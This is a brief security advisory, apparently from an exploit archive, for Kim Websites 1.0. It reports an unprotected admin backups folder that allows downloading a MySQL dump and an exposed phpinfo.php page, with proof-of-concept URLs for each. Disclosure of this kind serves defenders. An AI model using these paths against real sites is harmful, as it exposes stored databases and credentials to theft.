Kim Websites version 1.0 suffers from an arbitrary backup download and phpinfo disclosure vulnerabilities.
39735faafcaec39dd0ceafca9d97be5a35310db3e4e4a66de2f406114c199703
###############################################################
[+] Kim Websites 1.0 Download Backup/PHPInfo Disclosure
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################
[+] Download Backup
- Go to backup folder.No restricting index or htaccess :
http://127.0.0.1/[path]/admin/backups/
PoC :
http://127.0.0.1/[path]/admin/backups/mysql_beurstip_20_Nov_2006.SQL
[+] PHPInfo Disclosure
PoC :
http://127.0.0.1/[path]/phpinfo.php
###############################################################